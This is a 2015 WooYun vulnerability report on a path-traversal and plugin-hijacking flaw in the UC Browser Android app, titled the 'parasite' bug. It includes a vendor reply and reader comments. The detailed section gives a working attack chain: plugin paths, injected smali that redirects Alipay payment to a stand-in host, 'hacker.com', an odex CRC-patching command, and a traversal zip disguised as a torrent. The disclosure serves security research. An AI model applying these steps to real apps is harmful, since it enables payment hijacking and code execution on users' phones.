UC浏览器寄生兽漏洞(附支付劫持案例) | wooyun-2015-0124055| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124055

漏洞标题：UC浏览器寄生兽漏洞(附支付劫持案例)

漏洞作者：路人甲

提交时间：2015-07-02 10:43

修复时间：2015-09-30 14:18

公开时间：2015-09-30 14:18

漏洞类型：远程代码执行

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-07-02：细节已通知厂商并且等待厂商处理中
2015-07-02：厂商已经确认，细节仅向厂商公开
2015-07-05：细节向第三方安全合作伙伴开放
2015-08-26：细节向核心白帽子及相关领域专家公开
2015-09-05：细节向普通白帽子公开
2015-09-15：细节向实习白帽子公开
2015-09-30：细节向公众公开

简要描述：

UC浏览器寄生兽漏洞(附支付劫持案例)

详细说明：

1.定位污染插件
支付宝插件

07-01 16:06:46.051  19185-19212/? I/IPoison-com.UCMobile﹕ dexPath = /data/data/com.UCMobile/com/alipay/dex/alipay.jar | optimizedDirectory = /data/data/com.UCMobile/com/alipay/odex | libraryPath = /data/data/com.UCMobile/com/alipay/dex/alipay.jar

APk文件:/data/data/com.UCMobile/com/alipay/dex/alipay.jar
odex 文件:/data/data/com.UCMobile/com/alipay/odex/alipay.dex
so文件:/data/data/com.UCMobile/com/alipay/dex/alipay.jar
淘宝插件

07-01 18:04:41.511  22518-23410/? I/IPoison-com.UCMobile﹕ dexPath = /data/data/com.UCMobile/com/tae/dex/tae.jar | optimizedDirectory = /data/data/com.UCMobile/com/tae/odex | libraryPath = /data/data/com.UCMobile/com/tae/dex/tae.jar

apk 文件:/data/data/com.UCMobile/com/tae/dex/tae.jar
odex 文件:/data/data/com.UCMobile/com/tae/odex/tae.dex
so 文件:/data/data/com.UCMobile/com/tae/dex/tae.jar
2.确认目录遍历漏洞,即用于 UC 浏览器的写权限
制作包含../的压缩包,解压缩时达到预期效果
3.支付过程

IHook-com.UCMobile  I  startActivity Component:com.UCMobile/com.alipay.sdk.app.H5PayActivity
                        I  startActivity EXTRA:
                        I  startActivity EXTRA 1:
                        I  startActivity Class: java.lang.String
                        I  startActivity Key: url
                        I  startActivity Value: https://mclient.alipay.com/cashierRoutePay.htm

4.插入 smali 代码后使用DexClassLoader 构造方法优化生成 odex 文件

.line 105
    iget-object v0, p0, Lcom/alipay/sdk/app/H5PayActivity;->e:Landroid/webkit/WebView;
    new-instance v2, Lcom/alipay/sdk/app/H5PayActivity$MyWebChromeClient;
    invoke-direct {v2, p0, v6}, Lcom/alipay/sdk/app/H5PayActivity$MyWebChromeClient;-><init>(Lcom/alipay/sdk/app/H5PayActivity;Lcom/alipay/sdk/app/H5PayActivity$1;)V
    invoke-virtual {v0, v2}, Landroid/webkit/WebView;->setWebChromeClient(Landroid/webkit/WebChromeClient;)V
	
	const-string v1, "http://hacker.com/ali.html"
    .line 109
    iget-object v0, p0, Lcom/alipay/sdk/app/H5PayActivity;->e:Landroid/webkit/WebView;
    invoke-virtual {v0, v1}, Landroid/webkit/WebView;->loadUrl(Ljava/lang/String;)V

5.patch crc和 modwhen

» python patch_odex.py patch ApkIDE_alipay.dex orign/alipay.jar patch.dex
	Original modTime: 0x46e19916
	Original CRC: 0x728fcb25
	Apk ModTime: 0x4688a1b6
	APK classes CRC: 0x15517b04

6.制作 POC 压缩包,释放后即可转化为执行权限.

» tar vft  seed.zip 
	-rwxrwxrwx  0 0      0      224344  7  1 19:11 ../../../../../../../../../../data/data/com.UCMobile/com/alipay/odex/alipay.dex
	-rwxrwxrwx  0 0      0       93212  7  1 19:26 我是谁_没有绝对安全的系统.4.37GB.torrent

7.诱导用户下载解压..

漏洞证明：

之后任意使用支付插件的支付行为都会触发劫持,效果如图

附带其他可能有问题的插件

修复方案：

1.encode ../
2.check plugs load

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：低

漏洞Rank：1

确认时间：2015-07-02 14:16

厂商回复：

您好，我们之前已经收到了国家安全应急响应中心的通知，属于已知漏洞。漏洞正在修复中。感谢您对阿里巴巴安全的关注和支持。

漏洞评价：

2015-07-02 10:45 | 疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞，心中自然无码。)

劫持支付过程额？
2015-07-02 10:47 | 瘦蛟舞 ( 普通白帽子 | Rank:687 漏洞数:78 | 铁甲依然在)

mark
2015-07-02 10:51 | 天地不仁以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁万物为刍狗)

寄生兽？那是个什么gui······
2015-07-02 13:02 | rayh4c ( 普通白帽子 | Rank:240 漏洞数:23 )

首先尊重白帽子挖掘漏洞，但希望不要再这样一个一个APP刷漏洞了，现在各大厂商都已经知道细节，都在很辛苦的加班修复，再以这种方式报漏洞欠妥。
2015-07-02 15:11 | 贫道来自河北 ( 普通白帽子 | Rank:1419 漏洞数:425 | 一个立志要把乌云集市变成零食店的男人)

@天地不仁以万物为刍狗数字平台给1W的漏洞
2015-07-02 15:16 | 天地不仁以万物为刍狗 ( 普通白帽子 | Rank:977 漏洞数:264 | 天地本不仁万物为刍狗)

@贫道来自河北哦哦那个啊话说某60平台不是不公开原则吗？怎么利用方法跑出来了是有别的大神复现了方法？
2015-07-02 15:17 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

这个是数字平台自己的团队发现的
2015-07-02 15:17 | 贫道来自河北 ( 普通白帽子 | Rank:1419 漏洞数:425 | 一个立志要把乌云集市变成零食店的男人)

@天地不仁以万物为刍狗估计双投被
2015-07-02 15:24 | 贫道来自河北 ( 普通白帽子 | Rank:1419 漏洞数:425 | 一个立志要把乌云集市变成零食店的男人)

@scanf 360的人还能在自家投洞还给钱，这不脱裤子放屁吗
2015-07-02 16:07 | scanf ( 核心白帽子 | Rank:1232 漏洞数:186 | 。)

这就不清楚了
2015-07-08 18:54 | 地狱怪客 ( 路人 | Rank:8 漏洞数:1 | ❀❀❀❀❀❀❀❀❀❀❀❀❀❀❀❀❀❀❀❀...)

这个吊

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124055

漏洞标题：UC浏览器寄生兽漏洞(附支付劫持案例)

相关厂商：UC Mobile

漏洞作者：路人甲

提交时间：2015-07-02 10:43

修复时间：2015-09-30 14:18

公开时间：2015-09-30 14:18

漏洞类型：远程代码执行

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0124055

漏洞标题：UC浏览器寄生兽漏洞(附支付劫持案例)

相关厂商：UC Mobile

漏洞作者： 路人甲

提交时间：2015-07-02 10:43

修复时间：2015-09-30 14:18

公开时间：2015-09-30 14:18

漏洞类型：远程代码执行

危害等级：高

自评Rank：10

漏洞状态：厂商已经确认

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0124055"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

厂商回复：

最新状态：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云